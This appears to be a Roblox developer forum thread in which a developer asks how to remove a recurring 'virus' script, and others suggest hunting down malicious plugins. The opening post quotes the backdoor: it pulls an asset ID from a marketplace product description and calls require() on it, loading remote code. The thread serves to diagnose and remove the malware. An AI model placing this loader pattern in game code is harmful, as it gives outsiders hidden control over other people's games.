Weird virus in my game

1. What do you want to achieve? I want to get rid of this virus.

2. What is the issue? I searched in my scripts for marketplaceservice and this scripts popped up, This is the code they carry.

marketplaceService = game:GetService('MarketplaceService') productInfo = marketplaceService:GetProductInfo(2655062037) modulefunc = productInfo.Description modulefunc = tonumber(string.match(modulefunc, '%d+')) require(modulefunc)[tostring(productInfo.Name)](game.PlaceId)

dfsfs|306x192

1. What solutions have you tried so far? I tried deleting them but they appeared again after a while.
4 Likes

I think you are using a plugin that generates virus every second. Try to find this plugin in your plugin manager

1 Like

Search through your plugins and flush it out. If all else fails, you can use vaccines.

These are my plugins, Obfuscate and Backdoor Scanner has script injections allowed.

1 Like

Hello,

Looks like there may be a plugin that makes virus. I think you should look last added plugins
and remove them one and one. It may be solved

Best Regards

This three anti-virus, scanner and multiple object is suspicious.

Multiple Object Remover and Anti-Virus v2 does not have script injections enabled, I will delete backdoor scanner and try again.

Check the creators of the following plugins: Multiple Object, GameGuard Anti Virus V2 and Backdoor Scanner.

All of the plugins look very suspicious, if you click on the creator and for example see a bacon hair or a terminated account, it means that the plugin is malicious.

Try to watch the code of the plugin that have script injections allowed with Asset Loader - Roblox
or just with running game:GetObjects("rbxassetid://THE-ID-HERE")[1].Parent = workspace in the console

1 Like

Backdoor scanner’s creator looks suspicious, I will delete it.

1 Like

I use Load Character Lite too so I don’t suspicipus about it. I most suspicipus about Game Guard Anti Virus V2 and Backdoor Scanner

1 Like

Obfuscate’s creator is truthful. Defaultio’s has so many good plugins and games

2 Likes

Hello

yes I looked for something about him and yes, you’re right so I changed it

1 Like

I am not suspicious about Load Character Lite too. Anti Virus does not have script injections.

Send the Plugin id of Obfuscate and Backdoor Scanner

There plugin are 100% safe image

1 Like

I deleted backdoor scanner now, Obfuscate is 930021250.

Obfuscate can’t be virus. The creator of Obfuscate is Defaultio and he has so many good games and plugins in roblox Defaultio - Roblox

1 Like

Obfuscate have strange script source creation

File : 930021250.rbxm (12,4 Ko)

1 Like

I think it is a variable for changing script’s source also Defaultio is creator of Lumber Tycoon 2. But yeah, this script is weird.

1 Like

that is an anti-virus script I think

1 Like